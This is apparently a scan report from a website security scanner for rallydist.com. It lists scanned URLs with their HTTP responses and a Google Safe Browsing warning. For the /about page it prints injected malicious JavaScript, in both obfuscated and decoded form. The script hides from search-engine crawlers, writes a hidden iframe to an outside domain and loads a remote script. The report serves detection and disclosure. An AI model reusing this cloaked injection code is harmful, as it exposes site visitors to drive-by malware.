Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rallydist.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.rallydist.com/ | 200 OK Content-Length: 63319 Content-Type: text/html | clean |
http://www.rallydist.com/wp-content/themes/inove/js/base.js | 200 OK Content-Length: 2678 Content-Type: application/javascript | clean |
http://www.rallydist.com/wp-content/themes/inove/js/menu.js | 200 OK Content-Length: 4798 Content-Type: application/javascript | clean |
http://www.rallydist.com/about | 200 OK Content-Length: 29186 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _1Ol='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKsFTSoQGbph2Qk5WZwBXYuwWSPpwOdBzWpcCZhVGangSZtFmTnFGV5J0c05WZtVGbFRXZn5CduVWb1N2bkBSPgwWSPBichZnC7kCTSVlL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPsJXdmcyKpIXZyJXZmVmcuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9YWZyZyJrcyav1zYyNHdld2Pv02bj5SZ0F2YzVnZi9Wet5SawF2LvoDc0RHanASPgMmcz5CbxkkC7kyJ0BXayN2cngCduVWblxWRlRXYlJ3YuQnbl1Wdj9GZg0DIsFTSgIXY2tTf7kCKrFWZyJ0egkCM94TKnUGb0JXdUdCKm9EelRmbp5CduV2ZBJXZzVnLy9GdhdWa2Fmbuc3bk5Wa3BCf8BCM94TKnQ3biVGbn92bHd Decoded script: var _escape='%3Ciframe%20src%3D%22http%3A//virtuoso-luxury.info/go.php%3Fsid%3D1%22%20width%3D20%20height%3D20%20frameborder%3D20%3E%3C/iframe%3E';if(window.navigator.userAgent.indexOf('Rambler')>=0 || window.navigator.userAgent.indexOf('Yandex')>=0 || window.navigator.userAgent.indexOf('Yaho')>=0 || window.navigator.userAgent.indexOf('Googlebot')>=0 || window.navigator.userAgent.indexOf('Turtle')>=0) {Break();};var I1l = document.createElement('script'); I1l.src = 'http: I1l.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OIl = document.getElementsByTagName('head')[0]; OIl.appendChild(I1l);document.write(unescape(_escape)); Antivirus reports:
| ||
http://www.rallydist.com/wp-content/themes/inove/js/comment.js | 200 OK Content-Length: 2256 Content-Type: application/javascript | clean |
http://www.rallydist.com/about/trackback | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 30 Sep 2014 06:24:29 GMT Location: http://www.rallydist.com/about Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.rallydist.com/xmlrpc.php X-Powered-By: PHP/5.3.27 | clean |
http://www.rallydist.com/test404page.js | 404 Not Found Content-Length: 1970 Content-Type: text/html | clean |
http://www.rallydist.com/wp-login.php | 200 OK Content-Length: 2303 Content-Type: text/html | clean |
http://www.rallydist.com/wp-login.php?action=lostpassword | 200 OK Content-Length: 1951 Content-Type: text/html | clean |
http://www.rallydist.com/feed | 200 OK Content-Length: 38513 Content-Type: text/xml | clean |
http://www.rallydist.com/luxury-cat-bed.php | 200 OK Content-Length: 30137 Content-Type: text/html | clean |
http://www.rallydist.com/category/bed | 200 OK Content-Length: 67774 Content-Type: text/html | clean |
http://www.rallydist.com/spring-air-adjustable-bed.php | 200 OK Content-Length: 33522 Content-Type: text/html | clean |
http://www.rallydist.com/author | 404 Not Found Content-Length: 1970 Content-Type: text/html | clean |
http://www.rallydist.com/spring-air-adjustable-bed.php/trackback | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 30 Sep 2014 06:24:37 GMT Location: http://www.rallydist.com/spring-air-adjustable-bed.php Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Link: <http://www.rallydist.com/?p=1393>; rel=shortlink X-Pingback: http://www.rallydist.com/xmlrpc.php X-Powered-By: PHP/5.3.27 | clean |
http://www.rallydist.com/unfinished-dresser.php | 200 OK Content-Length: 29449 Content-Type: text/html | clean |
http://www.rallydist.com/category/dresser | 200 OK Content-Length: 51918 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rallydist.com
Result:
GET / HTTP/1.1
Host: rallydist.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: rallydist.com
Referer: http://www.google.com/search?q=rallydist.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rallydist.com
Referer: http://www.google.com/search?q=rallydist.com
Result:
The result is similar to the first query. There are no suspicious redirects found.